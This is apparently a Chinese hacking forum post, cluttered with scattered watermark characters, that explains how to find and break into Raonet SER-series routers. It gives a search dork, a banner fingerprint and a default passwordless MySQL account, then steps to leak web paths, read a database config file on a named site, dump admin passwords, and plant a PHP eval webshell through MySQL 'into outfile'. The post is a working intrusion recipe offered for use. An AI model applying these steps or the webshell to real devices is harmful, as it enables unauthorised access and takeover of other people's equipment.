寻找存在漏洞的路由器方法: l" L5 ^" P ~! R
$ ~" \" r- r( ?
1:google搜索'Raonet Subscriber Ethernet Router'
" k( F P0 e# ?
! N: t+ I E9 Q$ F2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001; f9 K" T6 Y9 J3 q* U- f, ^" n
# a$ Q; _* `8 q3 U1 D
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
: k2 E g$ b: t9 I4 v+ R# V1 R/ n& P) ?- p% ^4 D% m( }1 ~
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
3 H. u4 y( _4 k0 ]- O: ~: i. h: C) S8 S0 L, {: _
8 h p- Y G" E8 |
) F' w' {7 y$ }$ `' Y8 N入侵步骤:* f' d, C' ?) p8 U( H& |9 g
4 ], ~$ K$ {, v) o" K1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php1 z; q, y- g9 C( ~ U
" @: O% @' j) X2 [/ l# L5 c6 y2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc( G Y; c; H% }$ w
3:得到密码后连接,查看GUI管理密码:
6 `+ |9 \4 g/ b" h/ t7 }1 ~use ser_5004 ~& A3 P+ S% g3 g
select id,passwd from user;
, V. R5 o- s6 W, b4:通过数据库写入webshell,执行命令:
W: V h& q7 z g8 X% p1 P r( m+ luse mysql;
! E8 \3 \! _6 i+ P' Y1 J$ j9 fcreate table ok(cmd TEXT);: C3 W3 K& [4 F
insert into ok values("<?php @eval($_POST[cmd])?>");
" U; l' K T6 |8 u* x0 d1 q) {select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";7 i9 t# O' b6 n5 E. q1 q6 O( s
drop table ok;2 N/ [/ c' d# k' G, N' E
/ }9 q. g" [7 D a. M
5:连接后门shell.php , R' I" l% `3 k' w
7 ^2 \) W! g" I$ y/ D2 G6 r6. 搞定!4 G4 x3 u) y2 U) k
8 b, b* g3 l( j v3 T) t |